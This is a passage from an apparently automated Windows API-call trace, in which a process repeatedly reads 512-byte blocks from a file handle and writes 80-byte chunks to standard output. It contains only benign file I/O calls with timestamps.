_open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] GetFileType (hFile=0x58) returned 0x1 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x12e304 | out: lpFileSizeHigh=0x12e304*=0x0) returned 0x7d600 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.044] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.044] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.044] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0131.044] GetFileType (hFile=0x50) returned 0x1 [0131.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.044] GetFileType (hFile=0x50) returned 0x1 [0131.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.044] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] GetFileType (hFile=0x50) returned 0x1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] GetFileType (hFile=0x50) returned 0x1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.045] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, 
lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.046] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.046] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 
[0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] GetFileType (hFile=0x50) returned 0x1 [0131.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.046] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, 
lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.047] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.047] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.047] GetFileType (hFile=0x50) returned 0x1 [0131.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.048] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.048] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, 
lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.048] GetFileType (hFile=0x50) returned 0x1 [0131.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 
| out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.049] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.049] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.049] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 
[0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.050] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.050] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.050] GetFileType (hFile=0x50) returned 0x1 [0131.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 
[0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.051] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.051] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, 
lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] GetFileType (hFile=0x50) returned 0x1 [0131.051] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.051] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.052] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.052] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType (hFile=0x50) returned 0x1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.052] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.052] GetFileType 
